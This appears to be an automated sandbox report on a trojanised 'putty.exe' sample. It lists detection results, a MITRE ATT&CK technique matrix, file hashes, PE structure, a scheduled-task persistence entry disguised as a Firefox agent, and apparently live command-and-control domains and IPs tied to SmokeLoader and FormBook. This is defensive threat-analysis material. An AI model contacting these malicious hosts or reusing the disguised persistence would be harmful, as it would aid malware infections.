                Source: explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
                Source: explorer.exe, 00000002.00000000.2162061323.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: explorer.exe, 00000002.00000000.2162061323.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2163274118.0000000004B00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000002.00000000.2162061323.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000002.00000000.2162061323.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 00000002.00000000.2161750223.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
                Source: C:\Users\user\AppData\Roaming\hajefwbCode function: 6_2_004055EB GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_004055EB
                Source: C:\Users\user\Desktop\putty.exeCode function: 0_2_0041E7A0 GetDateFormatA,FoldStringA,BuildCommDCBA,GetTimeFormatA,SetProcessPriorityBoost,SetFileAttributesA,UnregisterWaitEx,SetLocaleInfoA,InterlockedDecrement,GetCommandLineA,SetErrorMode,GetAtomNameA,SearchPathA,SetDefaultCommConfigA,GetConsoleAliasW,GetVersionExA,DisconnectNamedPipe,GetEnvironmentStringsW,WriteConsoleOutputW,GetModuleHandleA,OpenFileMappingW,LocalAlloc,InterlockedIncrement,0_2_0041E7A0

                Stealing of Sensitive Information

                Source: Yara matchFile source: 4.3.hajefwb.890000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.hajefwb.880e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.putty.exe.940e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.putty.exe.950000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.hajefwb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.putty.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2177513700.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2439563956.00000000009E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2439353004.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2177303401.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2110499167.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2388445359.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                Source: Yara matchFile source: 4.3.hajefwb.890000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.hajefwb.880e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.putty.exe.940e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.putty.exe.950000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.hajefwb.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.putty.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2177513700.0000000002471000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2439563956.00000000009E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2439353004.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2177303401.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2110499167.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2388445359.0000000000890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 32 Process Injection | 11 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 12 Virtualization/Sandbox Evasion | LSASS Memory | 511 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 32 Process Injection | Security Account Manager | 12 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Hidden Files and Directories | NTDS | 3 Process Discovery | Distributed Component Object Model | Input Capture | 113 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 14 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 File Deletion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Behavior graph (image not preserved). ID: 1578162; Sample: putty.exe; Start date: 19/12/2024; Architecture: WINDOWS; Score: 100

                Source | Detection | Scanner | Label | Link
                putty.exe | 38% | Virustotal | | Browse
                putty.exe | 47% | ReversingLabs | |
                putty.exe | 100% | Avira | HEUR/AGEN.1312567 |
                putty.exe | 100% | Joe Sandbox ML | |

                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Roaming\hajefwb | 100% | Avira | HEUR/AGEN.1312567 |
                C:\Users\user\AppData\Roaming\hajefwb | 100% | Joe Sandbox ML | |
                C:\Users\user\AppData\Roaming\hajefwb | 47% | ReversingLabs | |

                No Antivirus matches
                No Antivirus matches

                Source | Detection | Scanner | Label | Link
                http://constractionscity1991.lat/ | 100% | Avira URL Cloud | malware |
                http://connecticutproperty.ru/ | 100% | Avira URL Cloud | malware |
                http://restructurisationservice.ru/ | 100% | Avira URL Cloud | malware |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                constractionscity1991.lat | 94.156.177.51 | true | false | | high
                restructurisationservice.ru | 94.156.177.51 | true | false | | high
                connecticutproperty.ru | 194.85.61.76 | true | false | | high
                Name | Malicious | Antivirus Detection | Reputation
                http://connecticutproperty.ru/ | true | Avira URL Cloud: malware | unknown
                http://constractionscity1991.lat/ | true | Avira URL Cloud: malware | unknown
                http://restructurisationservice.ru/ | true | Avira URL Cloud: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                https://word.office.comon | explorer.exe, 00000002.00000000.2167378082.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | | high
                http://www.autoitscript.com/autoit3/J | explorer.exe, 00000002.00000000.2170453754.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | false | | high
                https://android.notify.windows.com/iOS | explorer.exe, 00000002.00000000.2164199732.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | false | | high
                https://powerpoint.office.comcember | explorer.exe, 00000002.00000000.2169811038.000000000C460000.00000004.00000001.00020000.00000000.sdmp | false | | high
                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 00000002.00000000.2169811038.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | false | | high
                https://api.msn.com/ | explorer.exe, 00000002.00000000.2167378082.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp | false | | high
                https://excel.office.com | explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | false | | high
                http://schemas.micro | explorer.exe, 00000002.00000000.2166756581.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2166091631.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2166717992.0000000008870000.00000002.00000001.00040000.00000000.sdmp | false | | high
                http://crl.v | explorer.exe, 00000002.00000000.2161750223.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://outlook.com | explorer.exe, 00000002.00000000.2167378082.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | false | | high
                https://wns.windows.com/)s | explorer.exe, 00000002.00000000.2167378082.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | | high
                                            IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                            94.156.177.51 | constractionscity1991.lat | Bulgaria | | 43561 | NET1-ASBG | false
                                            194.85.61.76 | connecticutproperty.ru | Russian Federation | | 48287 | RU-CENTERRU | false
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1578162
                                            Start date and time:2024-12-19 10:56:48 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 2s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:6
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:putty.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@3/2@3/2
                                            EGA Information:
                                            • Successful, ratio: 66.7%
                                            HCA Information:
                                            • Successful, ratio: 97%
                                            • Number of executed functions: 34
                                            • Number of non-executed functions: 17
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target hajefwb, PID 3648 because there are no executed function
                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                            • Report size getting too big, too many NtOpenKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            Time | Type | Description
                                            04:58:00 | API Interceptor | 429384x Sleep call for process: explorer.exe modified
                                            10:58:11 | Task Scheduler | Run new task: Firefox Default Browser Agent E7DF06E12256AB2C path: C:\Users\user\AppData\Roaming\hajefwb
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            94.156.177.51#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • restructurisationservice.ru/
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • restructurisationservice.ru/
                                            #U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                            • restructurisationservice.ru/
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • restructurisationservice.ru/
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                            • restructurisationservice.ru/
                                            194.85.61.76#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • connecticutproperty.ru/
                                            Quotation sheet.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                            • www.mrpokrovskii.pro/2pji/
                                            PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                            • www.mrpokrovskii.pro/2pji/
                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                            • www.mrpokrovskii.pro/2pji/
                                            payments.exeGet hashmaliciousFormBookBrowse
                                            • www.mrpokrovskii.pro/2pji/
                                            RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                            • www.vpnboo.online/4kww/
                                            LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                            • www.vpnboo.online/m5yo/
                                            Yofmdizwhylbef.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                            • www.xn--d1acnfnmta.xn--p1ai/pn4e/?gc=raMz3&l2-nV=Axqd9uYmYp7orgQRubN12KIz0ETn9asgfk1mJK/Z6DbIFwnZ/4JiG197Yvj4xywBazNpNhV4fsXABdsflsvFVf+OSeCGS2bZ+rXq8mGhIxid
                                            Nbvkrvfanxfmla.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                            • www.xn--d1acnfnmta.xn--p1ai/pn4e/?KfTD=Axqd9uYmYp7orgQRubN12KIz0ETn9asgfk1mJK/Z6DbIFwnZ/4JiG197Yvj4xywBazNpNhV4fsXABdsflsvXc8+TStbsRm/06Q==&pd=8k02Xq71ReL2NgiL
                                            FATURA_DE_PAGAMENTO.exeGet hashmaliciousFormBookBrowse
                                            • www.barbershoploft.ru/de12/?WL08l6oh=z2MmLdpGYTzXqHttvHkhuP8LzrYrvN86bq5ZbTeVah9RZm+7kleL13c93Bfr74AMZ8sc&8pXDi=4hc4dRq
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            constractionscity1991.lat#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            #U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            restructurisationservice.ru#U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbsGet hashmaliciousSmokeLoaderBrowse
                                            • 94.156.177.51
                                            #U041f#U043b#U0430#U0442i#U0436#U043d#U0430 i#U043d#U0441#U0442#U0440#U0443#U043a#U0446i#U044f.jsGet hashmaliciousSmokeLoaderBrowse
                                            Process:C:\Windows\explorer.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):245760
                                            Entropy (8bit):5.638844672935597
                                            Encrypted:false
                                            SSDEEP:3072:VC2pwqpX3QufagAKaKkWvqMFh1KjP40ZZ6s5dM6Y273v9blsf:I4wqpX3qgAKaIvqRjBZVM/y
                                            MD5:3BBAC642557B0AB934ADDBAC0594561C
                                            SHA1:0787A06F1FFF51BDFDB129186DF44E73D8C7D5DE
                                            SHA-256:BC887FCD6805824AC58A107917C6D083056D688EEF39E979DA25D16EB388E798
                                            SHA-512:C91CBC77B3A67F65082F5D8187F237B9DE0A6AAF1CBFB7BBD0E3157D2B8815F55A6ED71D6BDA88941DAED67AD6F0EE9A9E98149F11B053F81A462E17F7145730
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 47%
                                            Reputation:low
                                            Process:C:\Windows\explorer.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview:[ZoneTransfer]....ZoneId=0
                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):5.638844672935597
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:putty.exe
                                            File size:245'760 bytes
                                            MD5:3bbac642557b0ab934addbac0594561c
                                            SHA1:0787a06f1fff51bdfdb129186df44e73d8c7d5de
                                            SHA256:bc887fcd6805824ac58a107917c6d083056d688eef39e979da25d16eb388e798
                                            SHA512:c91cbc77b3a67f65082f5d8187f237b9de0a6aaf1cbfb7bbd0e3157d2b8815f55a6ed71d6bda88941daed67ad6f0ee9a9e98149f11b053f81a462e17f7145730
                                            SSDEEP:3072:VC2pwqpX3QufagAKaKkWvqMFh1KjP40ZZ6s5dM6Y273v9blsf:I4wqpX3qgAKaIvqRjBZVM/y
                                            TLSH:08347C1336F1E067E7B78A3079FCD6B02A3BB87B9B74814E1224279F19712908A5D753
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B.AK#..K#..K#...lK.J#..UqY.U#..UqH._#..Uq^.%#..l...N#..K#..>#..UqW.J#..UqI.J#..UqL.J#..RichK#..................PE..L...F.&f...
                                            Icon Hash:151a131010911409
                                            Entrypoint:0x401a92
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x6626F246 [Mon Apr 22 23:27:02 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:0
                                            File Version Major:5
                                            File Version Minor:0
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:0
                                            Import Hash:d4d3ffca50bc999994f856732f42114f
                                            Instruction
                                            call 00007FEB2CDA73F9h
                                            jmp 00007FEB2CDA371Dh
                                            mov edi, edi
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 00000328h
                                            mov dword ptr [00427C38h], eax
                                            mov dword ptr [00427C34h], ecx
                                            mov dword ptr [00427C30h], edx
                                            mov dword ptr [00427C2Ch], ebx
                                            mov dword ptr [00427C28h], esi
                                            mov dword ptr [00427C24h], edi
                                            mov word ptr [00427C50h], ss
                                            mov word ptr [00427C44h], cs
                                            mov word ptr [00427C20h], ds
                                            mov word ptr [00427C1Ch], es
                                            mov word ptr [00427C18h], fs
                                            mov word ptr [00427C14h], gs
                                            pushfd
                                            pop dword ptr [00427C48h]
                                            mov eax, dword ptr [ebp+00h]
                                            mov dword ptr [00427C3Ch], eax
                                            mov eax, dword ptr [ebp+04h]
                                            mov dword ptr [00427C40h], eax
                                            lea eax, dword ptr [ebp+08h]
                                            mov dword ptr [00427C4Ch], eax
                                            mov eax, dword ptr [ebp-00000320h]
                                            mov dword ptr [00427B88h], 00010001h
                                            mov eax, dword ptr [00427C40h]
                                            mov dword ptr [00427B3Ch], eax
                                            mov dword ptr [00427B30h], C0000409h
                                            mov dword ptr [00427B34h], 00000001h
                                            mov eax, dword ptr [00425004h]
                                            mov dword ptr [ebp-00000328h], eax
                                            mov eax, dword ptr [00425008h]
                                            mov dword ptr [ebp-00000324h], eax
                                            call dword ptr [000000C8h]
                                            Programming Language:
                                            • [C++] VS2008 build 21022
                                            • [ASM] VS2008 build 21022
                                            • [ C ] VS2008 build 21022
                                            • [IMP] VS2005 build 50727
                                            • [RES] VS2008 build 21022
                                            • [LNK] VS2008 build 21022
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x238fc | 0x3c | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x403000 | 0x119b0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x22000 | 0x198 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x20dbc | 0x20e00 | 5c541c616f9b306ff42b3e4f234151f9 | False | 0.6227423954372624 | data | 6.440374416875712 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x22000 | 0x222a | 0x2400 | 7532422a3849ad26f5d656584a69be00 | False | 0.3527560763888889 | data | 5.379872759729207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x25000 | 0x3dd13c | 0x7000 | c5455776ba3d819123800dd3a4929859 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x403000 | 0x119b0 | 0x11a00 | 2db4edf44b4628cb44c7dd6130a95d88 | False | 0.44549257535460995 | data | 4.756112777224745 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x4035e0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkmen | Turkmenistan | 0.511727078891258 |
| RT_ICON | 0x404488 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkmen | Turkmenistan | 0.5631768953068592 |
| RT_ICON | 0x404d30 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkmen | Turkmenistan | 0.6002304147465438 |
| RT_ICON | 0x4053f8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkmen | Turkmenistan | 0.630057803468208 |
| RT_ICON | 0x405960 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkmen | Turkmenistan | 0.4050829875518672 |
| RT_ICON | 0x407f08 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkmen | Turkmenistan | 0.4732645403377111 |
| RT_ICON | 0x408fb0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkmen | Turkmenistan | 0.4692622950819672 |
| RT_ICON | 0x409938 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkmen | Turkmenistan | 0.5709219858156028 |
| RT_ICON | 0x409e18 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Turkmen | Turkmenistan | 0.3443496801705757 |
| RT_ICON | 0x40acc0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Turkmen | Turkmenistan | 0.46796028880866425 |
| RT_ICON | 0x40b568 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Turkmen | Turkmenistan | 0.5028801843317973 |
| RT_ICON | 0x40bc30 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Turkmen | Turkmenistan | 0.5245664739884393 |
| RT_ICON | 0x40c198 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Turkmen | Turkmenistan | 0.4254149377593361 |
| RT_ICON | 0x40e740 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Turkmen | Turkmenistan | 0.4329268292682927 |
| RT_ICON | 0x40f7e8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Turkmen | Turkmenistan | 0.4364754098360656 |
| RT_ICON | 0x410170 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Turkmen | Turkmenistan | 0.4512411347517731 |
| RT_STRING | 0x410808 | 0x4ee | data | | | 0.43898573692551507 |
| RT_STRING | 0x410cf8 | 0xee | data | | | 0.5546218487394958 |
| RT_STRING | 0x410de8 | 0x6d6 | data | | | 0.42857142857142855 |
| RT_STRING | 0x4114c0 | 0x748 | data | | | 0.4248927038626609 |
| RT_STRING | 0x411c08 | 0x830 | data | | | 0.4193702290076336 |
| RT_STRING | 0x412438 | 0x712 | data | | | 0.4298342541436464 |
| RT_STRING | 0x412b50 | 0x78a | data | | | 0.4202072538860104 |
| RT_STRING | 0x4132e0 | 0x754 | data | | | 0.4211087420042644 |
| RT_STRING | 0x413a38 | 0x914 | data | | | 0.41179001721170394 |
| RT_STRING | 0x414350 | 0x65e | data | | | 0.4306748466257669 |
| RT_GROUP_ICON | 0x4105d8 | 0x76 | data | Turkmen | Turkmenistan | 0.6694915254237288 |
| RT_GROUP_ICON | 0x409da0 | 0x76 | data | Turkmen | Turkmenistan | 0.6610169491525424 |
| RT_VERSION | 0x410650 | 0x1b4 | data | | | 0.5688073394495413 |
| DLL | Import |
|---|---|
